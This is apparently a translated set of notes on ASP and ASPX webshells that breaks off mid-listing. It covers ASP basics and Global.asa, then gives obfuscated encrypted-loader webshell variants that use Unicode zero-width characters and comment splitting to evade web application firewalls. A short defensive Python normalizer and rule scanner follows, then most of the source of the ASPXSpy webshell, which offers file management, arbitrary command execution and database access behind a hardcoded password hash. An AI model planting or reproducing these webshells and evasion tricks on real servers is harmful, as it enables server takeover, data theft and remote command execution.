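1. Active Server Pages (ASP)
ASP (Active Server Pages) is an application developed by Microsoft as a replacement for CGI scripts. It can interact with databases and other programs and is a convenient, simple programming tool. ASP pages use the .asp extension and are commonly used in all kinds of dynamic websites.
0x1 ASP scripts
Microsoft's ASP language went through a long period of development. In essence, Microsoft embedded the PC's script execution capability into the server side (later integrated into IIS).
1. VBScript: the VB language
·ADO (ActiveX Data Objects): this component makes database operations very simple for a program
·COM+
2. JavaScript: in essence, JS is not a browser-only language. Any host program that is built with and integrates a JS JIT engine can interpret and run any JS code, and IIS ASP integrates a JS engine.
Basic ASP syntax
// Note: both language and CodePage can be omitted, in which case the default is VBScript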
<%@ language="javascript"%>
<% Response.Write("Hello World!") %>
// javascript can be abbreviated as jscript
<%@ language="jscript"%>
<% Response.Write("Hello World!") %>
<%@ CodePage=65001 Language="VBScript"%>
<% Response.Write("Hello World!") %>
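0x2 ASP built-in objects and referencing ActiveX components
ASP provides a set of components that encapsulate data and program code, in order to
1. Extend functionality
2. Simplify development
This rich functionality also gives full-featured webshells what they need: such a webshell can use these extension component APIs to implement file management and command execution.
ASP provides six built-in objects that can be used directly without being declared first
1. Request: receives information from the client
2. Response: sends information to the user
3. Server: controls the ASP runtime environment
4. Session: stores information about an individual user so that it can be reused
5. Application: stores data for use by multiple users
6. ObjectContext: lets ASP programs work directly with MTS for distributed transaction processing
Besides the built-in objects, ASP can also use ActiveX components. An ActiveX component must first be registered on the server; an instance is then created with the Server object's CreateObject method.
0x3 The global.asa file
Global.asa is an optional file that can contain declarations of objects, variables, and methods that every page in the ASP application can access. Any valid script code can be used in Global.asa.
Global.asa can contain the following
1. Application events
2. Session events
3. <object> declarations
4. TypeLibrary declarations
5. #include directives
// Global.asa must be stored in the root directory of the ASP application, and each application can have only one Global.asa file
Events in Global.asa
In Global.asa you can tell the application and session objects what to do when they start and end. The code that does this is placed in event handlers.
Global.asa can contain four types of events
1. Application_OnStart: occurs when the first user calls the first page of the ASP application. It occurs after the web server restarts or after Global.asa is edited.
2. Session_OnStart: occurs whenever a new user requests his or her first page in the ASP application
3. Session_OnEnd: occurs whenever a user ends a session. A session ends if no page is requested within the specified time (the default is 20 minutes).
4. Application_OnEnd: occurs after the last user ends their session. Typically this happens when the web server stops. This subroutine is used to clean up settings after the application stops, for example deleting records or writing information to a text file.
A Global.asa file might look like this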
<script language="vbscript" runat="server">
sub Application_OnStart
'some code
end sub
sub Application_OnEnd
'some code
end sub
sub Session_OnStart
'some code
end sub
sub Session_OnEnd
'some code
end sub
</script>
Because the ASP script delimiters (<% and %>) cannot be used to insert script into Global.asa, we need to use the HTML
https://www.freebuf.com/sectool/198286.html
https://github.com/antonioCoco/SharPyShell
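ASPX webshell obfuscation variants
Unicode zero-width joiner characters
Unicode escapes are supported in aspx, asmx, and ashx files
Unicode has a class of characters called ZWJ (zero width joiner)
Common ZWJ characters include the following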
\u200c
\u200d
\u200e
\u200f
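An interesting aside: emoji are joined together using ZWJ characters
Besides the ZWJ characters above, there is another kind of Unicode code point called the zero-width no-break space, namely the following characters, all of which can be spliced in between characters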
\ufeff
\u202a
\u202b
\u202c
\u202d
\u202e
In an ASP.NET environment, these obscure Unicode code points can be used to counter some WAFs
<%@language = c#%>
<%@Import Namespace="System.Reflection"%>
<%Session.Add("k","e45e329feb5d925b"); byte[] k = Encoding.Default.GetBytes(Session[0] + ""),c = Request.BinaryRead(Request.C\u202con\u202dtent\u202bLen\u202egth);
Assembly.Load(new System.Security.Cryptography.RijndaelManaged().CreateDecryptor(k, k).TransformFinalBlock(c, 0, c.Length)).CreateInstance("U").Equals(this);;;;;;;;;;;;;;;;;;;;;%>
Other declaration tags in aspx
We know that %@language="C#"% can be replaced with %@language="Csharp"%
We know that PHP has the
<script language='php'>
tag
ASP.NET has a similar tag as well
The code below is the familiar <% %> form
<% @language="C#" %>
<%Response.Write("hello world ashx");%>
Next, change the code block into the script-block form:
<script language=csharp runat=server>
void page_load(){Response.Write("hello world");}
</script>
It can also be written in the following form
<script language=csharp runat=server>
void page_load(){Response.Write("hello world");}
</script>
As you can see, only void page_load(){ } needs to be added. The code looks roughly like this
<script language=csharp runat=server>
void page_load(){
Session.Add("k","e45e329feb5d925b"); byte[] k = Encoding.Default.GetBytes(Session[0] + ""),c = Request.BinaryRead(Request.C\u202con\u202dtent\u202bLen\u202egth);
System.Reflection.Assembly.Load(new System.Security.Cryptography.RijndaelManaged().CreateDecryptor(k, k).TransformFinalBlock(c, 0, c.Length)).CreateInstance("U").Equals(this);
}
</script>
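Of course, this is only a simple substitution; it can be combined with other bypass methods.
It is just like replacing c# with csharp earlier: in a real engagement last year I ran into an AF that blocked the c# keyword but did not block csharp
Line-break behavior
C#'s /// feature and XML
Per the standard, C# specifies that /// can serve as an XML-syntax comment in aspx; put briefly, it is a comment.
Let's go straight to a demo: without breaking the syntax (using line breaks as separators), the following effect can be produced.
This comment behavior can be combined to some extent with aspx's native /xx/ and
Works: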
<%
@
language
=
c#
%>
<%
@Import
Namespace="System.Reflection"%>
<%Session.Add("k",
//////@#@!#!@#!@#!@#!@#!@#!@#
"e45e329feb5d925b"); byte[]
//////@#@!#!@#!@#!@#!@#!@#!@#
k = Encoding.Default.GetBytes(Session[0] + ""),
//////@#@!#!@#!@#!@#!@#!@#!@#
c = Request.BinaryRead(Request.C\u202con\u202dtent\u202bLen\u202egth);
//////@#@!#!@#!@#!@#!@#!@#!@#
Assembly.Load(new System.Security.Cryptography.RijndaelManaged().CreateDecryptor(k, k).TransformFinalBlock(c, 0, c.Length)).CreateInstance("U").Equals(this);%>
Fails: if it is not //, a syntax parsing error occurs
<%@language = c#%>
<%@Import Namespace="System.Reflection"%>
<%Session.Add("k","e45e329feb5d925b"); byte[] k = Encoding.Default.GetBytes(Session[0] + ""),c = Request.BinaryRead(Request.C\u202con\u202dtent\u202bLen\u202egth);
\\
Assembly.Load(new System.Security.Cryptography.RijndaelManaged().CreateDecryptor(k, k).TransformFinalBlock(c, 0, c.Length)).CreateInstance("U").Equals(this);%>
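For defenders, the three variations above (Unicode escapes inside identifiers, the c#/csharp and <% %>/<script runat=server> equivalents, and statements split by line breaks and // comments) all disappear once the source is canonicalized before rules are matched. The code points listed earlier are all Unicode category Cf (format), which C# removes when comparing identifiers. The following is an added example, not code from the original notes; the rule names, function names and sample fragments are assumptions constructed for illustration.

```python
import re
import unicodedata

UNICODE_ESCAPE = re.compile(r"\\u([0-9a-fA-F]{4})")
BLOCK_COMMENT = re.compile(r"/\*.*?\*/", re.S)
# Stop a // comment at "%>" so a comment cannot hide the rest of the line.
# (This also trims text after "//" in URLs, which is acceptable for matching.)
LINE_COMMENT = re.compile(r"//(?:(?!%>)[^\n])*")
IDENT = "[A-Za-z0-9_]"

# Hypothetical rule set for this example; intended for normalized text.
RULES = {
    "csharp-directive": re.compile(
        r"<%\s*@\s*(?:page\s+)?language\s*=\s*[\"']?(?:c#|csharp)", re.I),
    "csharp-script-block": re.compile(
        r"<script\b(?=[^>]*\blanguage\s*=\s*[\"']?(?:c#|csharp))"
        r"(?=[^>]*\brunat\s*=\s*[\"']?server)", re.I),
    "assembly-load": re.compile(r"\bAssembly\s*\.\s*Load\s*\(", re.I),
    "raw-body-read": re.compile(r"\bRequest\s*\.\s*BinaryRead\s*\(", re.I),
    "symmetric-decryptor": re.compile(r"\.\s*CreateDecryptor\s*\(", re.I),
}


def count_identifier_splits(text):
    """Count Cf (format) characters wedged between ASCII identifier characters."""
    cf = {ch for ch in text if unicodedata.category(ch) == "Cf"}
    if not cf:
        return 0
    cls = "[" + "".join(re.escape(ch) for ch in sorted(cf)) + "]+"
    pattern = re.compile("(?<=" + IDENT + ")" + cls + "(?=" + IDENT + ")")
    return sum(len(m.group()) for m in pattern.finditer(text))


def normalize(src):
    """Return (canonical_text, split_count) for one .aspx/.ashx/.asmx source."""
    src = src.lstrip("\ufeff")              # a leading BOM is legitimate
    src = BLOCK_COMMENT.sub(" ", src)       # comments first: C# does not
    src = LINE_COMMENT.sub(" ", src)        # expand \u escapes inside them
    decoded = UNICODE_ESCAPE.sub(lambda m: chr(int(m.group(1), 16)), src)
    splits = count_identifier_splits(decoded)
    visible = "".join(c for c in decoded if unicodedata.category(c) != "Cf")
    return re.sub(r"\s+", " ", visible).strip(), splits


def match_rules(text):
    """Names of the rules that match the given text, sorted."""
    return sorted(name for name, rx in RULES.items() if rx.search(text))


def scan(src):
    """Normalize first, then match; a non-zero split count is itself a finding."""
    text, splits = normalize(src)
    return {"rules": match_rules(text), "split_identifier_chars": splits}


# Constructed samples: inert fragments that only carry the evasions.
SAMPLE_ESCAPES = (r'<%@ language = c# %><% int n = Request.C\u202con\u202dtent'
                  r'\u202bLen\u202egth; byte[] b = Request.Bin\u200daryRead(n); %>')
SAMPLE_SPLIT = ("<%\n@\nlanguage\n=\nc#\n%>\n<%\n//////@#@!#!\n"
                "var a = System.Reflection.Assembly\n//////@#@!#!\n.Load(data);\n%>")
SAMPLE_SCRIPT = ('<script language=csharp runat=server>\n'
                 'void page_load(){Response.Write("hello world");}\n</script>')

if __name__ == "__main__":
    for name, sample in [("escapes", SAMPLE_ESCAPES), ("split", SAMPLE_SPLIT),
                         ("script", SAMPLE_SCRIPT)]:
        # Compare matching on the raw bytes with matching after normalization.
        print(name, "raw:", match_rules(sample), "normalized:", scan(sample))
```

Matching the same rules on the raw text misses the API names in the first two samples, and the identifier-split count flags the first one even when no rule fires.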
Full-featured webshell
aspxspy.aspx
<%@ Page Language="C#" Debug="true" trace="false" validateRequest="false" %>
<%@ import Namespace="System.IO" %>
<%@ import Namespace="System.Diagnostics" %>
<%@ import Namespace="System.Data" %>
<%@ import Namespace="System.Data.OleDb" %>
<%@ import Namespace="Microsoft.Win32" %>
<%@ import Namespace="System.Net.Sockets" %>
<%@ Assembly Name="System.DirectoryServices, Version=2.0.0.0, Culture=neutral, PublicKeyToken=B03F5F7F11D50A3A" %>
<%@ import Namespace="System.DirectoryServices" %>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<script runat="server">
/*
Thanks Snailsor,FuYu
Code by Bin
Make in China
Blog: http://www.rootkit.net.cn
E-mail : master@rootkit.net.cn
*/
public string Password = "21232f297a57a5a743894a0e4a801fc3";//PASS:admin
public string SessionName = "ASPXSpy";
public string Bin_Action = "";
public string Bin_Request = "";
protected OleDbConnection conn = new OleDbConnection();
protected OleDbCommand comm = new OleDbCommand();
protected void Page_Load(object sender, EventArgs e)
{
if (Session[SessionName] != "BIN")
{
Bin_login();
}
else
{
if (!IsPostBack)
{
Bin_main();
}
else
{
Bin_Action = Request["goaction"];
if (Bin_Action == "del")
{
Bin_Request = Request["todo"];
Bin_Filedel(Bin_Request, 1);
}
if (Bin_Action == "change")
{
Bin_Request = Request["todo"];
Bin_FileList(Bin_Request);
}
if (Bin_Action == "deldir")
{
Bin_Request = Request["todo"];
Bin_Filedel(Bin_Request, 2);
}
if (Bin_Action == "down")
{
Bin_Request = Request["todo"];
Bin_Filedown(Bin_Request);
}
if (Bin_Action == "rename")
{
Bin_Request = Request["todo"];
Bin_FileRN(Bin_Request, 1);
}
if (Bin_Action == "renamedir")
{
Bin_Request = Request["todo"];
Bin_FileRN(Bin_Request, 2);
}
if (Bin_Action == "showatt")
{
Bin_Request = Request["todo"];
Bin_Fileatt(Bin_Request);
}
if (Bin_Action == "edit")
{
Bin_Request = Request["todo"];
Bin_FileEdit(Bin_Request);
}
if (Bin_Action == "postdata")
{
Bin_Request = Request["todo"];
Session["Bin_Table"] = Bin_Request;
Bin_DataGrid.CurrentPageIndex = 0;
Bin_DBstrTextBox.Text = "";
Bin_Databind();
}
if (Bin_Action == "changedata")
{
Session["Bin_Table"] = null;
Bin_Request = Request["todo"];
Session["Bin_Option"] = Request["intext"];
Bin_Change();
Bin_DBinfoLabel.Visible = false;
Bin_DBstrTextBox.Text = Bin_Request;
}
if (Session["Bin_Table"] != null)
{
Bin_Databind();
}
}
}
}
public void Bin_login()
{
Bin_LoginPanel.Visible = true;
Bin_MainPanel.Visible = false;
Bin_MenuPanel.Visible = false;
Bin_FilePanel.Visible = false;
Bin_CmdPanel.Visible = false;
Bin_SQLPanel.Visible = false;
Bin_SuPanel.Visible = false;
Bin_IISPanel.Visible = false;
Bin_PortPanel.Visible = false;
Bin_RegPanel.Visible = false;
}
public void Bin_main()
{
TimeLabel.Text = DateTime.Now.ToString();
Bin_PortPanel.Visible = false;
Bin_RegPanel.Visible = false;
Bin_LoginPanel.Visible = false;
Bin_MainPanel.Visible = true;
Bin_MenuPanel.Visible = true;
Bin_FilePanel.Visible = false;
Bin_CmdPanel.Visible = false;
Bin_SQLPanel.Visible = false;
Bin_SuPanel.Visible = false;
Bin_IISPanel.Visible = false;
string ServerIP = "Server IP : "+Request.ServerVariables["LOCAL_ADDR"]+"<br>";
string HostName = "HostName : " + Environment.MachineName + "<br>";
string OS = "OS Version : " + Environment.OSVersion + "</br>";
string IISversion = "IIS Version : " + Request.ServerVariables["SERVER_SOFTWARE"] + "<br>";
string PATH_INFO = "PATH_TRANSLATED : " + Request.ServerVariables["PATH_TRANSLATED"] + "<br>";
InfoLabel.Text = "<hr><center><b><U>SYS-INFO</U></B></center>";
InfoLabel.Text += ServerIP + HostName + OS + IISversion + PATH_INFO + "<hr>";
InfoLabel.Text += Bin_Process() + "<hr>";
}
private bool CheckIsNumber(string sSrc)
{
System.Text.RegularExpressions.Regex reg = new System.Text.RegularExpressions.Regex(@"^0|[0-9]*[1-9][0-9]*$");
if (reg.IsMatch(sSrc))
{
return true;
}
else
{
return false;
}
}
public string Bin_iisinfo()
{
string iisinfo = "";
string iisstart = "";
string iisend = "";
string iisstr = "IIS://localhost/W3SVC";
int i = 0;
try
{
DirectoryEntry mydir = new DirectoryEntry(iisstr);
iisstart = "<input type=hidden name=goaction><input type=hidden name=todo><TABLE width=100% align=center border=0><TR align=center><TD width=6%><B>Order</B></TD><TD width=20%><B>IIS_USER</B></TD><TD width=25%><B>Domain</B></TD><TD width=30%><B>Path</B></TD></TR>";
foreach (DirectoryEntry child in mydir.Children)
{
if (CheckIsNumber(child.Name.ToString()))
{
string dirstr = child.Name.ToString();
string tmpstr = "";
DirectoryEntry newdir = new DirectoryEntry(iisstr + "/" + dirstr);
DirectoryEntry newdir1 = newdir.Children.Find("root", "IIsWebVirtualDir");
iisinfo += "<TR><TD align=center>" + (i = i + 1) + "</TD>";
iisinfo += "<TD align=center>" + newdir1.Properties["AnonymousUserName"].Value + "</TD>";
iisinfo += "<TD>" + child.Properties["ServerBindings"][0] + "</TD>";
iisinfo += "<TD><a href=javascript:Command('change','" + formatpath(newdir1.Properties["Path"].Value.ToString()) + "');>" + newdir1.Properties["Path"].Value + "</a></TD>";
iisinfo += "</TR>";
}
}
iisend = "</TABLE><hr>";
}
catch (Exception error)
{
Bin_Error(error.Message);
}
return iisstart + iisinfo + iisend;
}
public string Bin_Process()
{
string htmlstr = "<center><b><U>PROCESS-INFO</U></B></center><TABLE width=80% align=center border=0><TR align=center><TD width=20%><B>ID</B></TD><TD align=left width=20%><B>Process</B></TD><TD align=left width=20%><B>MemorySize</B></TD><TD align=center width=10%><B>Threads</B></TD></TR>";
string prostr = "";
string htmlend = "</TR></TABLE>";
try
{
Process[] myprocess = Process.GetProcesses();
foreach (Process p in myprocess)
{
prostr += "<TR><TD align=center>" + p.Id.ToString() + "</TD>";
prostr += "<TD align=left>" + p.ProcessName.ToString() + "</TD>";
prostr += "<TD align=left>" + p.WorkingSet.ToString() + "</TD>";
prostr += "<TD align=center>" + p.Threads.Count.ToString() + "</TD>";
}
}
catch (Exception Error)
{
Bin_Error(Error.Message);
}
return htmlstr + prostr + htmlend;
}
protected void LoginButton_Click(object sender, EventArgs e)
{
string MD5Pass = FormsAuthentication.HashPasswordForStoringInConfigFile(passtext.Text,"MD5").ToLower();
if (MD5Pass == Password)
{
Session[SessionName] = "BIN";
Bin_main();
}
else
{
Bin_login();
}
}
protected void LogoutButton_Click(object sender, EventArgs e)
{
Session.Abandon();
Bin_login();
}
protected void FileButton_Click(object sender, EventArgs e)
{
Bin_LoginPanel.Visible = false;
Bin_MenuPanel.Visible = true;
Bin_MainPanel.Visible = false;
Bin_FilePanel.Visible = true;
Bin_CmdPanel.Visible = false;
Bin_SQLPanel.Visible = false;
Bin_SuPanel.Visible = false;
Bin_IISPanel.Visible = false;
Bin_PortPanel.Visible = false;
Bin_RegPanel.Visible = false;
Bin_upTextBox.Text = formatpath(Server.MapPath("."));
Bin_CopyTextBox.Text = formatpath(Server.MapPath("."));
Bin_upTextBox.Text = formatpath(Server.MapPath("."));
Bin_FileList(Server.MapPath("."));
}
protected void MainButton_Click(object sender, EventArgs e)
{
Bin_main();
}
public void Bin_DriveList()
{
string file = "<input type=hidden name=goaction><input type=hidden name=todo>";
file += "<hr>Drives : ";
string[] drivers = Directory.GetLogicalDrives();
for (int i = 0; i < drivers.Length; i++)
{
file += "<a href=javascript:Command('change','" + formatpath(drivers[i]) + "');>" + drivers[i] + "</a> ";
}
file += " WebRoot : <a href=javascript:Command('change','" + formatpath(Server.MapPath(".")) + "');>" + Server.MapPath(".") + "</a>";
Bin_FileLabel.Text = file;
}
public void Bin_FileList(string Bin_path)
{
Bin_FilePanel.Visible = true;
Bin_CreateTextBox.Text = "";
Bin_CopytoTextBox.Text = "";
Bin_CopyTextBox.Text = Bin_path;
Bin_upTextBox.Text = Bin_path;
Bin_IISPanel.Visible = false;
Bin_DriveList();
string tmpstr="";
string Bin_Filelist = Bin_FilelistLabel.Text;
Bin_Filelist = "<hr>";
Bin_Filelist += "<table width=90% border=0 align=center>";
Bin_Filelist += "<tr><td width=40%><b>Name</b></td><td width=15%><b>Size(Byte)</b></td>";
Bin_Filelist += "<td width=25%><b>ModifyTime</b></td><td width=25%><b>Operate</b></td></tr>";
try
{
Bin_Filelist += "<tr><td>";
string parstr = "";
if (Bin_path.Length < 4)
{
parstr = formatpath(Bin_path);
}
else
{
parstr = formatpath(Directory.GetParent(Bin_path).ToString());
}
Bin_Filelist += "<i><b><a href=javascript:Command('change','" + parstr + "');>|Parent Directory|</a></b></i>";
Bin_Filelist += "</td></tr>";
DirectoryInfo Bin_dir = new DirectoryInfo(Bin_path);
foreach (DirectoryInfo Bin_folder in Bin_dir.GetDirectories())
{
string foldername = formatpath(Bin_path) + "/" + formatfile(Bin_folder.Name);
tmpstr += "<tr>";
tmpstr += "<td><a href=javascript:Command('change','" + foldername + "')>" + Bin_folder.Name + "</a></td><td><b><i><dir></i></b></td><td>" + Directory.GetLastWriteTime(Bin_path + "/" + Bin_folder.Name) + "</td><td><a href=javascript:Command('renamedir','" + foldername + "');>Ren</a>|<a href=javascript:Command('showatt','" + foldername + "/');>Att</a>|<a href=javascript:Command('deldir','" + foldername + "');>Del</a></td>";
tmpstr += "</tr>";
}
foreach (FileInfo Bin_file in Bin_dir.GetFiles())
{
string filename = formatpath(Bin_path) + "/" + formatfile(Bin_file.Name);
tmpstr += "<tr>";
tmpstr += "<td>" + Bin_file.Name + "</td><td>" + Bin_file.Length + "</td><td>" + Directory.GetLastWriteTime(Bin_path + "/" + Bin_file.Name) + "</td><td><a href=javascript:Command('edit','" + filename + "');>Edit</a>|<a href=javascript:Command('rename','" + filename + "');>Ren</a>|<a href=javascript:Command('down','" + filename + "');>Down</a>|<a href=javascript:Command('showatt','" + filename + "');>Att</a>|<a href=javascript:Command('del','" + filename + "');>Del</a></td>";
tmpstr += "</tr>";
}
tmpstr += "</talbe>";
}
catch (Exception Error)
{
Bin_Error(Error.Message);
}
Bin_FilelistLabel.Text = Bin_Filelist + tmpstr;
}
public void Bin_Filedel(string instr,int type)
{
try
{
if (type == 1)
{
File.Delete(instr);
}
if (type == 2)
{
foreach (string tmp in Directory.GetFileSystemEntries(instr))
{
if (File.Exists(tmp))
{
File.Delete(tmp);
}
else
{
Bin_Filedel(tmp, 2);
}
}
Directory.Delete(instr);
}
}
catch (Exception Error)
{
Bin_Error(Error.Message);
}
Bin_FileList(Bin_upTextBox.Text);
}
public void Bin_FileRN(string instr,int type)
{
try
{
if (type == 1)
{
string[] array = instr.Split(',');
File.Move(array[0], array[1]);
}
if (type == 2)
{
string[] array = instr.Split(',');
Directory.Move(array[0], array[1]);
}
}
catch (Exception Error)
{
Bin_Error(Error.Message);
}
Bin_FileList(Bin_upTextBox.Text);
}
public void Bin_Filedown(string instr)
{
try
{
FileStream MyFileStream = new FileStream(instr, FileMode.Open, FileAccess.Read, FileShare.Read);
long FileSize = MyFileStream.Length;
byte[] Buffer = new byte[(int)FileSize];
MyFileStream.Read(Buffer, 0, (int)FileSize);
MyFileStream.Close();
Response.AddHeader("Content-Disposition", "attachment;filename=" + instr);
Response.Charset = "UTF-8";
Response.ContentType = "application/octet-stream";
Response.BinaryWrite(Buffer);
Response.Flush();
Response.End();
}
catch (Exception Error)
{
Bin_Error(Error.Message);
}
}
public void Bin_Fileatt(string instr)
{
Bin_AttPanel.Visible = true;
Bin_FilePanel.Visible = true;
try
{
string Att = File.GetAttributes(instr).ToString();
Bin_ReadOnlyCheckBox.Checked = false;
Bin_SystemCheckBox.Checked = false;
Bin_HiddenCheckBox.Checked = false;
Bin_ArchiveCheckBox.Checked = false;
if (Att.LastIndexOf("ReadOnly") != -1)
{
Bin_ReadOnlyCheckBox.Checked = true;
}
if (Att.LastIndexOf("System") != -1)
{
Bin_SystemCheckBox.Checked = true;
}
if (Att.LastIndexOf("Hidden") != -1)
{
Bin_HiddenCheckBox.Checked = true;
}
if (Att.LastIndexOf("Archive") != -1)
{
Bin_ArchiveCheckBox.Checked = true;
}
Bin_CreationTimeTextBox.Text = File.GetCreationTime(instr).ToString();
Bin_LastWriteTimeTextBox.Text = File.GetLastWriteTime(instr).ToString();
Bin_AccessTimeTextBox.Text = File.GetLastAccessTime(instr).ToString();
}
catch (Exception Error)
{
Bin_Error(Error.Message);
}
Bin_AttLabel.Text = instr;
Session["FileName"] = instr;
Bin_DriveList();
}
public void Bin_FileEdit(string instr)
{
Bin_FilePanel.Visible = true;
Bin_EditPanel.Visible = true;
Bin_DriveList();
Bin_EditpathTextBox.Text = instr;
StreamReader SR = new StreamReader(instr, Encoding.Default);
Bin_EditTextBox.Text = SR.ReadToEnd();
SR.Close();
}
protected void Bin_upButton_Click(object sender, EventArgs e)
{
string uppath = Bin_upTextBox.Text;
if (uppath.Substring(uppath.Length - 1, 1) != @"/")
{
uppath = uppath + @"/";
}
try
{
Bin_UpFile.PostedFile.SaveAs(uppath + Path.GetFileName(Bin_UpFile.Value));
}
catch (Exception error)
{
Bin_Error(error.Message);
}
Bin_FileList(uppath);
}
public void Bin_Error(string error)
{
Bin_ErrorLabel.Text = "Error : " + error;
}
public string formatpath(string instr)
{
instr = instr.Replace(@"\", "/");
if (instr.Length < 4)
{
instr = instr.Replace(@"/", "");
}
if (instr.Length == 2)
{
instr = instr + @"/";
}
instr = instr.Replace(" ", "%20");
return instr;
}
public string formatfile(string instr)
{
instr = instr.Replace(" ", "%20");
return instr;
}
protected void Bin_GoButton_Click(object sender, EventArgs e)
{
Bin_FileList(Bin_upTextBox.Text);
}
protected void Bin_NewFileButton_Click(object sender, EventArgs e)
{
string newfile = Bin_CreateTextBox.Text;
string filepath = Bin_upTextBox.Text;
filepath = filepath + "/" + newfile;
try
{
StreamWriter sw = new StreamWriter(filepath, true, Encoding.Default);
}
catch (Exception Error)
{
Bin_Error(Error.Message);
}
Bin_FileList(Bin_upTextBox.Text);
}
protected void Bin_NewdirButton_Click(object sender, EventArgs e)
{
string dirpath = Bin_upTextBox.Text;
string newdir = Bin_CreateTextBox.Text;
newdir = dirpath + "/" + newdir;
try
{
Directory.CreateDirectory(newdir);
}
catch(Exception Error)
{
Bin_Error(Error.Message);
}
Bin_FileList(Bin_upTextBox.Text);
}
protected void Bin_CopyButton_Click(object sender, EventArgs e)
{
string copystr = Bin_CopyTextBox.Text;
string copyto = Bin_CopytoTextBox.Text;
try
{
File.Copy(copystr, copyto);
}
catch (Exception Error)
{
Bin_Error(Error.Message);
}
Bin_CopytoTextBox.Text = "";
Bin_FileList(Bin_upTextBox.Text);
}
protected void Bin_CutButton_Click(object sender, EventArgs e)
{
string copystr = Bin_CopyTextBox.Text;
string copyto = Bin_CopytoTextBox.Text;
try
{
File.Move(copystr, copyto);
}
catch (Exception Error)
{
Bin_Error(Error.Message);
}
Bin_CopytoTextBox.Text = "";
Bin_FileList(Bin_upTextBox.Text);
}
protected void Bin_SetButton_Click(object sender, EventArgs e)
{
try
{
string FileName = Session["FileName"].ToString();
File.SetAttributes(FileName, FileAttributes.Normal);
if (Bin_ReadOnlyCheckBox.Checked)
{
File.SetAttributes(FileName, FileAttributes.ReadOnly);
}
if (Bin_SystemCheckBox.Checked)
{
File.SetAttributes(FileName, File.GetAttributes(FileName) | FileAttributes.System);
}
if (Bin_HiddenCheckBox.Checked)
{
File.SetAttributes(FileName, File.GetAttributes(FileName) | FileAttributes.Hidden);
}
if (Bin_ArchiveCheckBox.Checked)
{
File.SetAttributes(FileName, File.GetAttributes(FileName) | FileAttributes.Archive);
}
if (FileName.Substring(FileName.Length - 1, 1) == "/")
{
Directory.SetCreationTime(FileName, Convert.ToDateTime(Bin_CreationTimeTextBox.Text));
Directory.SetLastWriteTime(FileName, Convert.ToDateTime(Bin_LastWriteTimeTextBox.Text));
Directory.SetLastAccessTime(FileName, Convert.ToDateTime(Bin_AccessTimeTextBox.Text));
}
else
{
File.SetCreationTime(FileName, Convert.ToDateTime(Bin_CreationTimeTextBox.Text));
File.SetLastWriteTime(FileName, Convert.ToDateTime(Bin_LastWriteTimeTextBox.Text));
File.SetLastAccessTime(FileName, Convert.ToDateTime(Bin_AccessTimeTextBox.Text));
}
}
catch (Exception Error)
{
Bin_Error(Error.Message);
}
Bin_FileList(Bin_upTextBox.Text);
Response.Write("<script>alert('Success!')</sc" + "ript>");
}
protected void Bin_EditButton_Click(object sender, EventArgs e)
{
try
{
StreamWriter SW = new StreamWriter(Bin_EditpathTextBox.Text, false, Encoding.Default);
SW.Write(Bin_EditTextBox.Text);
SW.Close();
}
catch (Exception Error)
{
Bin_Error(Error.Message);
}
Bin_FileList(Bin_upTextBox.Text);
Response.Write("<script>alert('Success!')</sc" + "ript>");
}
protected void Bin_BackButton_Click(object sender, EventArgs e)
{
Bin_FileList(Bin_upTextBox.Text);
}
protected void Bin_SbackButton_Click(object sender, EventArgs e)
{
Bin_FileList(Bin_upTextBox.Text);
}
protected void Bin_CmdButton_Click(object sender, EventArgs e)
{
Bin_MenuPanel.Visible = true;
Bin_LoginPanel.Visible = false;
Bin_CmdPanel.Visible = true;
Bin_SQLPanel.Visible = false;
Bin_CmdLabel.Text = "";
Bin_SuPanel.Visible = false;
Bin_IISPanel.Visible = false;
Bin_RegPanel.Visible = false;
Bin_PortPanel.Visible = false;
}
protected void Bin_RunButton_Click(object sender, EventArgs e)
{
try
{
Process Cmdpro = new Process();
Cmdpro.StartInfo.FileName = Bin_CmdPathTextBox.Text;
Cmdpro.StartInfo.Arguments = Bin_CmdShellTextBox.Text;
Cmdpro.StartInfo.UseShellExecute = false;
Cmdpro.StartInfo.RedirectStandardInput = true;
Cmdpro.StartInfo.RedirectStandardOutput = true;
Cmdpro.StartInfo.RedirectStandardError = true;
Cmdpro.Start();
string cmdstr = Cmdpro.StandardOutput.ReadToEnd();
cmdstr = cmdstr.Replace("<", "<");
cmdstr = cmdstr.Replace(">", ">");
Bin_CmdLabel.Text = "<hr><div id=\"cmd\"><pre>" + cmdstr + "</pre></div>";
}
catch (Exception Error)
{
Bin_Error(Error.Message);
}
}
protected void Bin_SQLButton_Click(object sender, EventArgs e)
{
Bin_CmdPanel.Visible = false;
Bin_SQLPanel.Visible = true;
Bin_LoginPanel.Visible = false;
Bin_MenuPanel.Visible = true;
Bin_AccPanel.Visible = false;
Bin_Scroll.Visible = false;
Bin_DBmenuPanel.Visible = false;
Bin_dirPanel.Visible = false;
Bin_SuPanel.Visible = false;
Bin_IISPanel.Visible = false;
Bin_PortPanel.Visible = false;
Bin_RegPanel.Visible =false;
}
protected void Bin_SQLRadioButton_CheckedChanged(object sender, EventArgs e)
{
Session["Bin_Table"] = null;
Bin_SQLconnTextBox.Text = "server=localhost;UID=sa;PWD=;database=master;Provider=SQLOLEDB";
Bin_SQLRadioButton.Checked = true;
Bin_AccRadioButton.Checked = false;
Bin_AccPanel.Visible = false;
Bin_DataGrid.Visible = false;
Bin_Scroll.Visible = false;
Bin_DBmenuPanel.Visible = false;
Bin_dirPanel.Visible = false;
}
protected void Bin_AccRadioButton_CheckedChanged(object sender, EventArgs e)
{
Session["Bin_Table"] = null;
Bin_SQLconnTextBox.Text = @"Provider=Microsoft.Jet.OLEDB.4.0;Data Source=E:\wwwroot\database.mdb";
Bin_SQLRadioButton.Checked = false;
Bin_AccRadioButton.Checked = true;
Bin_DBmenuPanel.Visible = false;
Bin_AccPanel.Visible = false;
Bin_DataGrid.Visible = false;
Bin_Scroll.Visible = false;
Bin_dirPanel.Visible = false;
}
protected void OpenConnection()
{
if (conn.State == ConnectionState.Closed)
{
try
{
conn.ConnectionString = Bin_SQLconnTextBox.Text;
comm.Connection = conn;
conn.Open();
}
catch (Exception Error)
{
Bin_Error(Error.Message);
}
}
}
protected void CloseConnection()
{
if (conn.State == ConnectionState.Open)
conn.Close();
conn.Dispose();
comm.Dispose();
}
public DataTable Bin_DataTable(string sqlstr)
{
OleDbDataAdapter da = new OleDbDataAdapter();
DataTable datatable = new DataTable();
try
{
OpenConnection();
comm.CommandType = CommandType.Text;
comm.CommandText = sqlstr;
da.SelectCommand = comm;
